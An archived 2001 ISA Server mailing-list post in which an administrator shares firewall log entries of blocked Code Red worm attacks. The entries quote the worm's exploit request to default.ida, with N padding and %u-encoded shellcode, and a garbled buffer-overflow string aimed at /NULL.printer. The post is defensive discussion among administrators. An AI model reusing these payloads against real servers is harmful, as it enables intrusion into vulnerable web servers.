RE: FW: Alert: New version of Code Red, XXXX
- From: "Michael Jankowski" <skyjumpr@xxxxxxxxxxx>
- To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
- Date: Sun, 5 Aug 2001 11:42:46 -0500
Wow, don't know what happened to those last emails.
After a few days of portscans (all successfully blocked) I finally
started getting Code Red attacks. Some interesting info on the attacks.
A few of the source IP's have been pretty thorough about hitting every
possible combination in the ObjectName field. Regardless of their
configuration all attempts have been blocked.
From a few of the log entries - Intitial portion of ObjectName field
************************************************************************
***
http://www.worm.com/default.ida
http://207.225.151.2/default.ida ISA external ip address
http://207.225.151.1/default.ida ISA external ip address
http://TANIS/default.ida an internal web server name
(not sure how that was gotten. Although, I was in the process of setting
up an new site and ip's (ISAs and the web servers) around the time some
of the requests hit). ????
This is the log entry of a standard Code Red
***************************************************
207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy,
PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET,
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -
Check out the end of the ObjectName field in this one (/NULL.printer).
Not a standard Code Red but looks like they attempt a buffer overrun.
************************************************************************
***
216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy,
PALIN, -,
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂ�Ãâ�â@`3ÃÂ$�ÃÃÃÃÂÂÂ�1Åj,
-,
0, 80, 1182, 0, -, TCP, GET,
http://ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ;
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ
ÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂ3ÃÂÂ�Ãâ�â@`3ÃÂ$�ÃÃÃÃÂÂÂ�
1Åj/NULL.printer, -, -, 12202, 0x0, Default rule, -
Michael
"Never attribute to malice that which can be adequately explained by
stupidity." Hanlon's Razor
-----Original Message-----
From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx]
Sent: Sunday, August 05, 2001 11:25 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
Other related posts:
- » FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » Re: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
- » RE: FW: Alert: New version of Code Red, XXXX
